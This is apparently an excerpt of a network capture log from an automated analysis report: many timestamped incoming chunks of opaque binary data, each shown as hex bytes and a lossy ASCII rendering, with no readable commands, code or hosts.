                                                                                                                                                            2022-09-29 12:45:27 UTC35434INData Raw: 33 f4 23 a8 41 de 80 ca 71 39 7e fc aa 1d b6 5f 5f ae 95 83 bc aa c2 9b 6c 92 e1 69 f0 cb 92 f3 a4 65 43 33 7b 6f 20 ac d7 f2 ef 9e aa 6f 80 44 98 05 31 a9 ce ce 2c 43 ac 95 d2 52 09 7f 84 e4 75 b9 ae a8 91 d0 5d cb 3d a2 87 9e c2 a3 b6 92 ca ae ed f7 fa 3f 60 07 39 c1 c7 ef 7f 21 da 84 64 d5 6b 80 26 97 3a 6c 76 5b ef 70 c0 43 04 ac b9 5e 62 1d da 4c f4 a1 f1 24 eb 1f f2 b6 9c 61 27 3b 5e 8a bf 02 12 39 2e e7 39 97 aa ad ea 56 90 3a 97 70 51 e9 08 42 c8 d2 e8 b5 ec 11 14 47 e4 cf 10 14 0e f9 1e 0e b6 ee b5 9b 49 a1 c6 2f 86 fc fb 81 19 f3 97 fc e2 c6 38 25 2a 63 34 e1 3d 96 52 32 d2 ae 66 16 08 03 ab 4c 95 f3 39 90 7d 49 23 de 8f 7f 3d be 7f ad ee 11 f7 bb e8 16 6b e7 1e 7f c5 51 5a c2 95 92 9e f4 3a b9 41 90 8d 04 76 1a db 50 11 35 7b d5 35 72 da 2d a3
                                                                                                                                                            Data Ascii: 3#Aq9~__lieC3{o oD1,CRu]=?`9!dk&:lv[pC^bL$a';^9.9V:pQBGI/8%*c4=R2fL9}I#=kQZ:AvP5{5r-
                                                                                                                                                            2022-09-29 12:45:27 UTC35450INData Raw: 29 27 2d c9 1a 54 5c 65 bb 94 61 8d 94 73 17 93 f2 86 42 a1 ee 97 f7 fa c3 36 99 ad 05 dc fd ca 4f db 6f 9c f6 13 02 68 29 64 cd 02 68 d2 91 42 0d 4f df 35 fe 4a 84 26 40 d8 33 90 79 72 57 b5 9a 2c 2d 94 8b b8 34 8f ce 74 53 39 b9 81 37 5e c8 fc 9e 6e 43 5a ed 06 20 6d 49 06 21 49 73 58 d9 ce c1 98 ca 1e 6c 3c 7a 5c d6 52 a7 33 79 4a 95 ad 62 3c 57 fd 88 da bd 14 d3 56 d7 f0 e4 bb 99 a7 2a df b6 13 2f 7b 84 ec 95 a1 e3 0f 45 35 2c 0f 32 d4 49 ca b3 e7 40 8e d2 96 31 ff 08 6e 02 14 b4 70 7e 8c b7 ba 34 df ba 2c a4 1b 4e c4 da 5c b7 ce cd aa 65 48 d2 24 06 38 b6 f2 03 8f 6f ab 94 78 56 97 40 0f a4 b7 ce 47 33 4d 3d c2 46 63 6d 0c d9 78 1a 3e 18 73 96 3b 71 cf 4b b9 1e 05 07 fd ba 84 c3 ca e5 d9 50 6a 27 c2 08 9c 80 39 7f e7 2b 62 e9 7a 76 0e 13 12 7d bc eb
                                                                                                                                                            Data Ascii: )'-T\easB6Ooh)dhBO5J&@3yrW,-4tS97^nCZ mI!IsXl<z\R3yJb<WV*/{E5,2I@1np~4,N\eH$8oxV@G3M=Fcmx>s;qKPj'9+bzv}
                                                                                                                                                            2022-09-29 12:45:27 UTC35466INData Raw: 87 ff 14 36 28 3f ed f9 d7 53 94 fb aa ea 0d 44 ad bd ea af df e6 fb 51 e1 82 bc 1b fb 22 97 39 6f 9b 2e 53 20 2b 99 47 1a 7a 92 6e b4 d5 53 89 f0 25 3e 58 9b df 4f 27 52 c6 a9 cc fb 76 a3 56 81 ca b8 70 3f f6 32 20 b3 3f 07 4d 43 76 02 15 87 84 54 7e 5d 81 05 47 02 08 aa fb 7b c1 4e d9 54 c7 cd db e0 b7 78 bf 10 db df 8e a0 7b 0f ef e3 95 5b c1 e5 b0 bf 3e 05 9b e8 b2 9f d9 6c 48 21 01 5b fe 8e 6f b9 ee bd 16 e5 fa 4a a9 e7 b1 46 91 d9 ea 9e a5 90 c8 86 83 59 dd 3b f1 84 9a 84 53 77 87 ba 9a 45 98 8e b8 db 8c 9b b2 86 28 9d 8b 4b 71 0f 83 62 97 0b d8 8b 40 82 c8 1e e2 0b 17 d4 90 73 98 e4 3a 2e 82 4a 85 7e 87 cc 03 ac 13 14 1c c2 f8 ab 75 2f ec 51 56 27 3f 1a a1 09 1b 5f 46 83 a1 d5 e9 ca ec f7 b4 f9 47 78 a6 44 89 c8 a5 f1 d5 cc f7 15 0e 3d 55 b9 b2 6d
                                                                                                                                                            Data Ascii: 6(?SDQ"9o.S +GznS%>XO'RvVp?2 ?MCvT~]G{NTx{[>lH![oJFY;SwE(Kqb@s:.J~u/QV'?_FGxD=Um
                                                                                                                                                            2022-09-29 12:45:27 UTC35482INData Raw: 7a 8b 77 25 20 f8 33 7c 32 6b f9 c7 fa 5a ba 56 4a 04 2b 34 0d 85 58 29 61 1a 4f cf 3d 5e 01 fa 2d 91 b8 de 8a bf bd 4e 7b 3f 4b f8 2c 52 ac 13 2e b7 28 1e dd 23 9c 11 ca 98 91 48 1a a6 72 28 1b db cd 35 36 52 49 10 be 68 a6 2c 53 ff ac e8 73 db df 98 4d 40 c3 2f 08 8d d3 29 c7 0b 62 c2 10 5d 61 e3 64 54 9d dd ed c7 2f 00 29 ba b8 58 55 22 6f 6d 7e e7 72 b0 1d 0f 20 4b dc 93 23 3f 42 98 33 cc 77 e9 c6 1a 6a 7b ca 2d 4e d5 6e 86 90 b7 2e d0 b4 c1 27 bc 59 dc e4 9e 99 27 14 de d4 33 2f d7 2c b7 4f 07 08 6b ff ae 9b bc 3f 36 51 5f 6a 1b ba 6c 90 b5 65 73 3a 08 fb c8 32 2b ab 05 9a e9 d4 fe 82 18 8a 73 66 d6 2c e9 88 78 4e 64 c1 00 04 e7 60 89 c8 b8 ae 3f 91 aa 23 d3 f3 d1 02 09 58 8d 31 97 8e 3f 9a 1c 57 d9 ba b0 3e aa 41 94 78 50 68 a2 1d ad bd ac b9 eb 1d
                                                                                                                                                            Data Ascii: zw% 3|2kZVJ+4X)aO=^-N{?K,R.(#Hr(56RIh,SsM@/)b]adT/)XU"om~r K#?B3wj{-Nn.'Y'3/,Ok?6Q_jles:2+sf,xNd`?#X1?W>AxPh
                                                                                                                                                            2022-09-29 12:45:27 UTC35498INData Raw: bc bb 72 6d e1 03 bc 11 8b 8b 26 3e 35 ba f9 2b cb 93 60 00 96 b5 33 e4 11 79 0a c0 1e eb 1a e3 7f d5 39 38 2e 5a fe b2 8b be a3 38 b6 77 63 eb 82 9e 04 70 4f 43 de e1 c6 d9 af 92 d4 2c 10 58 7b 76 71 6a 00 41 92 75 cb 28 3d e6 b2 9a 1b 74 23 04 04 41 4b bc 35 7e 3b d7 16 ee 5f cb e7 f5 06 15 e6 32 23 f4 40 38 1d 64 3a 61 42 0b 44 21 91 1b 73 36 06 85 f6 c7 d4 b2 38 eb 3c 28 2a 88 50 58 32 bb f5 33 2a 96 d6 c7 44 3c 6d fb e9 3c 20 53 d0 b6 d7 ac ff 9c 24 5e c9 d1 52 02 d8 d2 83 e2 95 fe be 5f 74 9f 12 84 a1 0d e5 33 4a f9 41 d0 95 e3 d5 75 98 05 e5 20 49 f3 fe 09 95 bf 1b 13 cd 77 38 6c f3 f5 2d 90 ed ca 91 2c d6 74 f8 29 52 92 6a a1 c6 8c af 3a bc 83 84 a7 77 d9 5b 3c bb 1f 79 f2 a0 87 64 e0 90 1f 04 a8 72 b8 5d d2 48 e6 af 24 a8 39 15 0d b6 49 a5 1b c3
                                                                                                                                                            Data Ascii: rm&>5+`3y98.Z8wcpOC,X{vqjAu(=t#AK5~;_2#@8d:aBD!s68<(*PX23*D<m< S$^R_t3JAu Iw8l-,t)Rj:w[<ydr]H$9I
                                                                                                                                                            2022-09-29 12:45:27 UTC35514INData Raw: d3 bb 47 5a be 4f e6 bb b8 14 3f 87 2d a6 5e 8a 16 71 58 45 22 e1 85 d2 9e 53 eb cd fb 38 9e 73 ff 69 d8 93 ea de 9d 0f ac 2b fe b5 82 ef 7d 4e 90 5c 53 f7 cf e8 c4 fc 6c 99 88 b4 56 86 ab b0 e2 b1 a8 f2 31 51 06 a0 87 3e b9 52 ec 6d fd 62 c7 9b 1b c1 9a 4f cf e8 0b 20 87 ba e9 7e 9c cd 25 8c 16 ca 5c f8 3e 9a ff 5d 7a a4 77 d2 66 d0 08 e1 c1 81 8a c1 81 8e c0 7c 41 c6 7a a6 76 b9 20 ae 37 68 96 24 6a 7b 3e 8d d6 25 a6 3f 10 0b 6e 4b 16 fa e1 3e 62 3c 84 a3 c4 88 3f a8 7d fb 1d 76 cc c5 66 c5 5d 20 6e 01 6b 04 ba 5b aa d6 8f a4 7d 51 05 b9 7f 28 bc b9 9a f4 d1 cf 77 f9 8f 2b c4 01 ae 29 ba 77 95 33 aa 18 70 f2 07 c5 07 00 3f 32 13 2c 33 9e 08 eb 47 e4 9e b5 c8 f4 29 1b ea b7 d1 94 d3 6c 58 51 2f 1a 87 6b 29 f5 27 f9 2c 7b 3d ed 40 28 d3 44 e3 38 69 85 1f
                                                                                                                                                            Data Ascii: GZO?-^qXE"S8si+}N\SlV1Q>RmbO ~%\>]zwf|Azv 7h$j{>%?nK>b<?}vf] nk[}Q(w+)w3p?2,3G)lXQ/k)',{=@(D8i
                                                                                                                                                            2022-09-29 12:45:27 UTC35530INData Raw: c5 d9 7c 97 fd 3a b0 f3 b2 72 ac cb 63 0a 7b fb db 6e c8 03 56 50 f9 86 07 38 45 48 24 16 23 af ac 5a 57 0d 23 f9 bd 67 e5 24 01 cf 24 34 5b f4 ab dd 10 6b 69 16 03 ea bb 55 ef 83 ba 28 8b 78 b9 34 70 0e 50 06 75 02 9d 6a 02 5c 78 ff d1 70 35 51 0c 38 c6 3e c8 9b 2e fd 7e 02 7d 0d 6d 2d 8b 9f 26 07 28 8e 12 94 f8 74 43 4e 13 32 65 fe 22 6d 28 a7 c1 73 bd d1 59 55 bf 9a 09 84 6b 1c 17 9b 29 df 6a c7 db 2d d0 da d8 31 a0 d6 6b be 27 f2 7d 89 15 3a f5 40 d0 78 28 07 0b 5b 65 51 12 70 fe d6 e5 2d e4 91 00 1e 4c 48 d5 2e 22 26 99 b2 34 be 69 bd a5 0f 83 90 c8 15 a0 6d fd 30 7e 9f 18 d2 b5 d7 c6 ca 26 74 8d aa 9d 25 e4 31 8e 70 07 9a 26 59 c1 c1 e6 5e 92 f2 54 6a f6 1f b2 99 b0 e8 a4 0b 6a c4 06 fe 7b 5b 89 f3 18 75 24 89 a3 9d 26 51 db 44 d2 d6 c0 c8 f4 a5 9f
                                                                                                                                                            Data Ascii: |:rc{nVP8EH$#ZW#g$$4[kiU(x4pPuj\xp5Q8>.~}m-&(tCN2e"m(sYUk)j-1k'}:@x([eQp-LH."&4im0~&t%1p&Y^Tjj{[u$&QD
                                                                                                                                                            2022-09-29 12:45:27 UTC35546INData Raw: 97 fe f7 cc 9b a1 bc 2d 39 49 a8 40 c1 c0 e0 54 05 bc 78 2f 4b 20 34 cb a9 89 1f 37 1d 54 93 a4 f3 73 55 27 be 35 5e f8 2e 78 a8 f1 29 4c 4a 0e 50 77 56 b0 91 d0 8a 77 a1 ac 54 32 66 1c ab 9f 8b 7e 63 70 5c 90 55 a6 7a 1a eb c0 ce db de a0 53 10 e9 87 43 f2 91 db 5e ee ee e8 ea fc f4 db b6 ea ea a0 48 06 f1 40 b1 e0 5d 67 aa 28 6a 73 19 2d 38 2f 7f a8 8c 16 1f 83 8c 3d 5e 48 46 fa e3 f9 31 74 0e 69 98 98 59 a0 0a 51 8d 40 0d ff a1 5d 89 9f b4 9b d5 67 26 71 61 97 c7 f3 1e 5a 94 c9 bc 6f 23 87 51 41 4e c7 1d cf 35 f2 6a 88 14 fc a5 ba c1 73 99 45 b8 20 03 d3 de ad a2 e6 18 04 94 a7 74 b8 75 b1 79 f2 02 a0 6d 52 64 51 41 d0 ca de 98 74 3a cf ec 72 bb 44 66 74 4a 3c 68 b1 f6 29 bb cc 12 0d fb 0c 8f 7a b3 03 aa 92 6e 16 98 a6 03 c0 24 c9 33 a4 f6 37 d0 32 a4
                                                                                                                                                            Data Ascii: -9I@Tx/K 47TsU'5^.x)LJPwVwT2f~cp\UzSC^H@]g(js-8/=^HF1tiYQ@]g&qaZo#QAN5jsE tuymRdQAt:rDftJ<h)zn$372
                                                                                                                                                            2022-09-29 12:45:27 UTC35562INData Raw: 24 2c 7b d7 00 82 86 aa 73 77 fc 55 9b c1 b2 b3 75 ce 09 ad 66 5e fd e5 58 3e ca b1 80 ab 14 e7 6e 5b 49 f2 f2 70 04 57 0f 7d 43 f4 63 c6 15 26 47 ef cc 47 a9 63 c2 c3 02 9a 79 a0 d0 c9 88 13 65 4e 56 d7 74 ff f7 1a e8 91 31 0f c8 61 66 84 c7 57 13 cd 90 d1 7c 1b eb b1 8e 17 27 79 4f 5e 21 1a a1 f2 4b fb fc 48 49 79 01 ed 09 6a e4 ae d3 1b 83 9e 2d 43 91 a5 f4 6d 9c 64 0f 3c d0 41 b6 a8 0c 3f 2a 71 5b 83 0a 57 ff c5 95 59 1c 9e 7b 37 32 4c d8 90 0d a1 97 b7 db b7 a8 07 12 ee 43 52 35 3c 37 2a 33 9b 7e 5a a3 77 08 aa f0 4f e4 58 a1 29 2d c5 46 49 ff a1 0d 65 c7 25 83 63 a0 b6 bf 94 14 e0 fc c9 22 1b e6 4e 87 67 65 7d 0d d2 7a 92 d0 b2 11 9f ba ea 79 70 2f 30 10 8c 44 8e 64 64 b1 f8 ae 5c f1 98 c6 ab bb 19 1c 56 b6 c5 65 60 24 34 18 fd 73 d9 54 27 9c cb 64
                                                                                                                                                            Data Ascii: $,{swUuf^X>n[IpW}Cc&GGcyeNVt1afW|'yO^!KHIyj-Cmd<A?*q[WY{72LCR5<7*3~ZwOX)-FIe%c"Nge}zyp/0Ddd\Ve`$4sT'd
                                                                                                                                                            2022-09-29 12:45:27 UTC35578INData Raw: c8 62 c5 f0 0e 68 41 df 9c 4e 83 56 cc 89 82 ef 66 a3 af f2 f3 7f 7a ca c8 b6 1d 39 12 0e 40 90 80 6d 2c ed dc b6 4a e1 88 7a 08 cc a7 6f 3f 56 64 18 36 65 a1 8c 00 05 20 91 2a 09 33 bd 94 12 cd 47 e3 aa fc 13 a4 7d fe 77 dd 26 da b0 fa 31 c2 15 58 a2 6a 3b 6b 02 c4 3e f0 d6 5a bc 5b 15 5a e1 e6 4b 5e f6 56 67 07 7c 73 26 e7 1b 57 24 b6 b3 8b 34 b3 55 10 37 d9 5d 27 50 d9 4c a2 cc 47 66 fa c1 d4 14 03 1c 65 54 0c 59 1b 30 8b 50 f3 2b 06 d7 53 c8 fa 5b 5d 2a e1 6a 25 db 4a 4a de 30 9a d6 df fa 5b b2 0a 30 79 f8 02 fe 42 9f 28 57 52 06 e5 13 5a 76 4f 95 83 17 1f f6 38 e8 7d de 92 5f c4 31 69 5f 01 40 0f 8d 79 db cb 7a ca ac 30 7e 12 d1 08 7a 80 54 51 c8 46 3a 9c 48 20 c4 06 f7 d4 6b 31 c9 01 fc 23 bf 57 49 ee 65 25 7f bc 10 e5 65 6b 80 01 73 a2 af 28 2e 78
                                                                                                                                                            Data Ascii: bhANVfz9@m,Jzo?Vd6e *3G}w&1Xj;k>Z[ZK^Vg|s&W$4U7]'PLGfeTY0P+S[]*j%JJ0[0yB(WRZvO8}_1i_@yz0~zTQF:H k1#WIe%eks(.x
                                                                                                                                                            2022-09-29 12:45:27 UTC35594INData Raw: ac 67 57 43 00 ab f2 b0 10 39 35 94 00 63 2f d1 03 f1 bc ca 43 d7 b2 38 72 7e 66 bf 87 33 1d a4 67 87 c1 da 09 84 6e 56 26 66 63 c1 be b7 4b 9d 71 89 cb 31 b7 eb 23 e3 01 38 c9 80 ae 74 36 2e 10 db 43 a6 ae 00 51 7a ee 0e b1 5f 36 0c 4e 5d 8f de 1e a6 fa 4f e7 c9 ec 27 4a 1f a2 58 a3 f0 44 26 ed b4 f5 cf 27 44 a4 92 bd 90 ba 3c 1b 47 7f 9f e9 5c 36 97 7e 78 21 be 1a dc f8 3a f8 ba 90 41 18 ca 31 5d 1f 31 ce 52 0f f2 52 6e 8c 06 1a 77 c0 5d 3f 24 34 ee 50 6d 15 78 54 0a a4 f4 93 1e ca 50 ce 82 74 1e bb 7f c8 30 1e 82 b2 f4 2a ee b7 f7 3a 36 87 a0 d5 87 f1 1a 14 f7 27 9f 93 47 7c 28 56 29 24 65 6e 19 bf 88 33 58 7f 72 5a a6 6e 78 9c fc c3 35 ed a0 3f e6 7e 16 71 ef 03 ca 76 21 86 8f 2f 66 20 85 02 0b 62 c7 c5 5a ce 0b f8 6c d2 db 21 c0 ef d1 85 ee 8f 7a d1
                                                                                                                                                            Data Ascii: gWC95c/C8r~f3gnV&fcKq1#8t6.CQz_6N]O'JXD&'D<G\6~x!:A1]1RRnw]?$4PmxTPt0*:6'G|(V)$en3XrZnx5?~qv!/f bZl!z
                                                                                                                                                            2022-09-29 12:45:27 UTC35610INData Raw: 8e 0a 23 91 88 7d 85 c6 54 93 0f 58 d4 81 74 15 50 32 a9 0a f9 d7 eb b4 26 ba ba 55 f7 a5 da e8 36 b0 ba cc 0c 1e 05 1b 94 24 98 85 7a 14 58 78 33 17 e7 fb 90 d4 2f 5a 8d 7e ed 65 b3 03 8e 6e 14 30 2e e3 f9 c3 2f 39 5f 5d bc 06 7e 0c 70 5c df a1 6d 32 20 f9 bf 84 ae 6b 07 06 a2 65 bb c0 53 ba 8a 4d ba 27 03 0b 3e 4a be f5 0e 74 99 2b 71 20 53 86 50 b7 24 bd 56 5b 3e b6 79 07 0b 5f 30 52 11 b8 0a 44 9f f0 04 e2 90 2e 06 a1 94 27 3e 01 d0 7d 19 41 c9 c5 a5 e9 b9 39 84 97 25 10 8d 56 4d 69 00 9d d7 b9 08 9a e1 1c ae f4 9e ca d0 fe a2 f8 20 57 71 0e 19 ea 18 ac ff 9b 4a 93 91 b0 28 1e 66 02 94 af 7d 27 a8 ed a0 86 02 b9 39 8d 3b 25 38 c6 a7 62 6e 08 e0 14 8b 9d 49 3d 68 a3 5e 42 1e 28 76 12 16 fb 68 8f f8 7f 03 0f 13 ce 00 91 55 7b 7e e7 6f 07 c5 93 c0 1d 2c
                                                                                                                                                            Data Ascii: #}TXtP2&U6$zXx3/Z~en0./9_]~p\m2 keSM'>Jt+q SP$V[>y_0RD.'>}A9%VMi WqJ(f}'9;%8bnI=h^B(vhU{~o,
                                                                                                                                                            2022-09-29 12:45:27 UTC35626INData Raw: c5 cb f1 72 55 c5 6e 79 cf 3d aa 48 88 fe 30 7a 49 98 fe 5d eb 4f c2 a6 86 ad 73 60 d8 10 21 f8 69 ee d0 13 f7 f4 23 69 43 c5 09 0e 01 95 36 36 e7 a0 c5 79 08 94 45 b4 a6 d0 a3 1b 75 6b 01 32 9c e0 00 02 a4 b9 9c bd 97 6c b1 52 f2 50 02 d3 d7 92 d6 b2 e6 78 f4 50 b8 bc 7e fa dd 9f 25 fd 22 ee a2 d8 f1 e8 ad df 8a f1 c7 45 0e 3b b9 a2 54 14 d5 6b b6 2d ed e7 97 37 04 80 bc 5f 6f d1 0f 32 60 45 67 c2 51 0b 93 20 9e 21 4e 86 d8 5e a8 fa c0 a1 0c 28 90 da 7b 8c 24 cc 07 e9 76 d9 3c 63 14 49 83 35 49 05 bd 8c b5 85 b9 a1 6e 2e 21 36 13 f9 28 01 a2 ef 6f 63 24 5e 77 89 2d f7 12 9f 5f 4f 10 5e 1a ba 49 b2 2b 23 b1 2a e4 59 14 b3 86 bb 53 a8 48 d3 c0 03 a1 4a 91 5c 02 2d 22 58 d5 7a 6c 35 14 a6 0f 2d 35 d2 05 1b fe 11 48 9b 62 7a 77 4f 6a 23 54 c0 f0 4e 58 e9 7e
                                                                                                                                                            Data Ascii: rUny=H0zI]Os`!i#iC66yEuk2lRPxP~%"E;Tk-7_o2`EgQ !N^({$v<cI5In.!6(oc$^w-_O^I+#*YSHJ\-"Xzl5-5HbzwOj#TNX~
                                                                                                                                                            2022-09-29 12:45:27 UTC35642INData Raw: 5d 8d 09 0e 5d 2b 72 b2 a1 5f 9d 79 3d 7d 98 7f c4 f4 d8 5f 1e 07 5e 56 07 4f 44 2f cc 82 f9 22 22 0f 0f cf ee 2f 19 54 aa 3b f6 66 7c 31 4c aa 9d 58 e1 5d c9 be 07 16 57 3f 94 85 23 1e 8b 10 48 33 b7 1c 29 d5 e4 03 70 e8 ba 36 90 42 a5 03 88 cf 5e c8 4b bd 46 5f 8f 0c 7a 00 ab bb 56 c7 9c 3e 36 c6 22 99 03 82 4a ec 18 47 f0 32 d7 76 7d e0 bb f8 cf fb c7 8e af 7d 4d 24 68 3a 8e 4d 1a 7d 7f b3 9e 4b d8 e8 f5 07 56 39 6b ed 40 f0 da be fa 48 74 9c 8a 53 78 bc f8 38 28 e5 c8 8c 86 69 52 69 5d 62 c1 a5 70 d9 9a ec b4 43 f3 8d 4b b7 d6 2e df 62 e0 4d 0a 06 29 09 9c 92 d7 d6 ac 8f ce 2b 26 a1 ee 35 cf da 8d bb 86 22 a7 4a 60 42 13 54 05 1a 04 f4 5b c3 69 61 dd 01 0b fe 03 45 5e 86 64 7d 10 93 10 fc d0 e6 ec 49 18 11 f5 be 48 d5 ff 1b 27 ee b2 77 89 bb 3b 65 c1
                                                                                                                                                            Data Ascii: ]]+r_y=}_^VOD/""/T;f|1LX]W?#H3)p6B^KF_zV>6"JG2v}}M$h:M}KV9k@HtSx8(iRi]bpCK.bM)+&5"J`BT[iaE^d}IH'w;e
                                                                                                                                                            2022-09-29 12:45:27 UTC35658INData Raw: ca 67 8b 8d de a0 a4 f0 02 66 7a ad 94 db ae b2 61 56 c2 71 cf 5d ae 9e d7 4a 20 ad b1 ff ea 36 d5 10 7f 7d 7f 4b 2a 1d c0 60 a9 5e 5c 9d 8f 13 bb 22 51 2a e5 d8 eb 83 e2 f5 ec 32 51 6d cd c3 50 d8 01 c4 6e c9 a4 46 a1 67 14 42 fc d9 22 fc da 64 91 fa df 4b d7 2f 2d bd 7c fd 74 4c df c8 3e 2b 9d 8e 99 65 5c 70 f0 9e a0 66 d5 da 0d 80 d7 ba 24 ac b2 65 10 72 c8 8f 40 34 75 f4 5f 66 76 48 22 48 8b 4f 2a 09 54 bb 4d f9 f9 3b 8f e4 78 c9 28 d5 df d3 45 a8 34 5b ef 3c 7b bd af e6 50 16 55 92 03 59 ed 12 57 9e d2 b0 9a af 62 75 0e de 0f 5a 91 a7 52 d8 4c 04 ad 67 31 18 84 99 57 d6 a9 16 6a 83 ba 9f 85 f4 b7 74 e1 35 b4 72 32 4b 34 8c 06 ea 25 46 7c 52 a6 49 0e c5 56 9a a1 c9 c5 4c 79 77 da 1f 1c 24 c3 41 23 ac d4 90 ae b1 85 f8 59 a7 cc 68 a5 f1 73 33 c3 a3 73
                                                                                                                                                            Data Ascii: gfzaVq]J 6}K*`^\"Q*2QmPnFgB"dK/-|tL>+e\pf$er@4u_fvH"HO*TM;x(E4[<{PUYWbuZRLg1Wjt5r2K4%F|RIVLyw$A#Yhs3s
                                                                                                                                                            2022-09-29 12:45:27 UTC35668INData Raw: db e3 09 55 50 58 8e 45 49 1d b4 eb b0 7f 92 d6 2b e7 6b d6 10 22 6a 7a 9c 47 75 f2 61 6d e2 14 0a 94 02 eb 0d 7b e7 fe bd d6 6c 5e 27 6e ed a3 31 63 aa be c0 43 f5 ee d9 01 9c ce b8 3f 2c a4 b7 eb b9 ec 02 62 6f 9b 48 4a 1d 7c 24 8b 43 06 97 52 53 b6 dc c7 04 80 0e 0a 42 b6 9a 51 bc 9e b3 e3 e9 6f 7e ef 56 14 aa 44 cc c7 cc 5e 39 b4 99 7c 50 f8 a0 89 a1 96 ed 96 85 29 77 c1 75 57 f7 f6 75 a8 36 90 43 25 ae 7c 1c 98 e9 9c 03 4b 0d 61 b0 4a 8c 01 60 a8 b5 04 78 ed 2d 2d 9f 1c 8b f3 7d 99 8d 59 ca 1e b8 d7 ae f2 9b 87 07 d4 4a d6 93 05 85 54 6e 6b db 2d 19 44 56 0f f4 38 f3 be ad fc 2f 7d c1 fa b9 47 09 54 6b 1a 9f 06 b3 fc cb 17 bd ab 15 54 45 b4 b2 80 23 87 2d e3 e8 97 f6 0a 39 31 32 00 57 b5 42 40 ec 88 31 c9 b0 65 e9 39 16 e8 e8 34 1e 0c 3b 17 d6 e4 44
                                                                                                                                                            Data Ascii: UPXEI+k"jzGuam{l^'n1cC?,boHJ|$CRSBQo~VD^9|P)wuWu6C%|KaJ`x--}YJTnk-DV8/}GTkTE#-912WB@1e94;D
                                                                                                                                                            2022-09-29 12:45:27 UTC35684INData Raw: b8 00 ad 07 56 a4 9a ba fd 72 5c df 13 04 72 3d a4 75 0a bf b3 f5 46 fe 1c 5b d2 cf 90 40 53 89 d5 b2 6d 5f 69 bf c5 33 c9 00 49 6e 91 56 c9 d9 73 bf 5e 60 81 0a 77 6e cb 38 f2 38 9c 95 a9 d5 9e 9e 9f 88 75 94 a6 b1 1d 19 47 ea c6 46 83 9f 1d 34 3d 05 f4 82 87 5b a8 e3 e6 1e 99 2b 17 91 84 e1 cf fa 11 69 5a f2 51 9c 12 55 f6 1e 5e 44 d2 02 d5 a1 21 36 cd 63 46 59 f3 4f fe 00 06 5b 78 37 4b 7a 8e f5 87 49 2d 28 9f ab 0f 98 5e c0 59 ad 10 9a 38 33 5f 8e 74 c9 f2 56 d2 d9 5a 53 3b 5a c7 af 57 e4 0b 9c 73 80 e1 b3 90 b5 01 5d 77 26 b9 61 fa 20 0d 74 47 0a 2f 8b fd 02 83 c7 82 b3 9f df e4 35 39 6e 63 b5 89 cc a4 a8 f3 fe 7b 64 cb d0 4e 58 60 a9 07 b0 8a 68 b4 33 9f c8 9d ce 99 a4 f2 a9 e4 91 36 2b f7 2c 71 c4 6d 9d 4c ee 64 b3 1f 8d 94 64 9f e6 e0 90 f9 5f 9b
                                                                                                                                                            Data Ascii: Vr\r=uF[@Sm_i3InVs^`wn88uGF4=[+iZQU^D!6cFYO[x7KzI-(^Y83_tVZS;ZWs]w&a tG/59nc{dNX`h36+,qmLdd_
                                                                                                                                                            2022-09-29 12:45:27 UTC35700INData Raw: 73 39 40 f2 23 38 f7 91 31 9d fa b1 5f 92 c8 a8 a2 b8 ad 29 bc 89 df c4 f0 cd 7c 94 7e 6c 1c c8 4b 11 72 ac b8 21 d3 3a d7 05 06 6f 2c 2b 8f c6 f4 26 67 d6 98 12 26 5d 27 9c 0f b0 a2 47 06 7c d2 71 e1 9f 07 ca e6 6d 07 da 37 84 d6 dc 19 e9 50 35 6c 48 56 ac 61 39 2b b5 95 b5 aa 42 07 de 4b 69 37 5f 35 23 09 58 57 ab 88 c3 7a c2 50 5a 4b 17 32 e4 9b a0 bd 14 46 79 b6 04 1f 28 e3 df 4e 37 b2 ff 42 66 bb cd 6e 63 22 3c 24 d2 d7 a7 75 6a 75 6a fc 22 3f af 90 0e f3 19 4a ad 91 ae 95 d6 0c f6 7d c4 b3 e4 9d b2 2a 8a 74 01 92 16 93 3a 32 8b 4a 58 56 a7 e9 cf eb 80 54 34 93 64 5e de c0 e6 68 eb 68 8c b7 81 89 ba 50 06 eb 52 1a b9 d9 67 fa 3a ba c1 13 6b 29 77 73 2c 4c 10 68 11 aa 78 04 7d f3 ef 40 ab 68 77 ac 24 ff f6 96 87 e2 85 bc bb 4a f5 d0 82 c4 30 72 67 69
                                                                                                                                                            Data Ascii: s9@#81_)|~lKr!:o,+&g&]'G|qm7P5lHVa9+BKi7_5#XWzPZK2Fy(N7Bfnc"<$ujuj"?J}*t:2JXVT4d^hhPRg:k)ws,Lhx}@hw$J0rgi
                                                                                                                                                            2022-09-29 12:45:27 UTC35716INData Raw: 06 85 3a 64 96 19 9d af b8 10 85 4b 38 db 36 31 b3 7e 1b fa 36 1b bb af 36 44 d6 43 bb 99 bc c3 65 af 04 78 1f d4 7b d9 5c f1 d6 e9 5e 7a bf dd 2d bd 6d d6 f3 cb 14 1e ca 6a 81 b6 29 91 04 b0 32 b0 8e 64 91 e8 de 3b 6f 34 c4 42 37 4b a5 8f ab f3 0b ac c5 d9 5c be 89 3c b1 d9 56 c3 40 02 f5 bb 17 6a 3d 79 90 1e 19 c3 6f 5b 6e f9 2b 7e cf f6 99 41 40 85 f1 53 5f e0 f6 31 b4 69 6a 6b 3f d1 55 55 17 c0 d6 e9 6a bb 5e b3 b7 58 0b 92 59 0d 33 79 c6 77 b3 5e bc 50 2a e1 06 16 1c ca 29 23 59 1a 64 54 fb f3 29 59 86 ea 94 f0 b7 21 28 a7 51 dd 96 57 3a 1b cc 6b 02 c1 7b 5f 13 6f 46 11 2d 44 dd 6f fd 95 5e 3a 97 bd 7d cb 4b 20 1f 60 86 c0 aa c1 b8 a8 0e 1b bc 18 00 36 8b 55 d5 6f 34 49 83 95 20 a8 15 7c 6d 94 96 d7 46 74 8b 66 68 82 ff a8 e4 6f 9e b2 f0 83 6a e9 7a
                                                                                                                                                            Data Ascii: :dK861~66DCex{\^z-mj)2d;o4B7K\<V@j=yo[n+~A@S_1ijk?UUj^XY3yw^P*)#YdT)Y!(QW:k{_oF-Do^:}K `6Uo4I |mFtfhojz
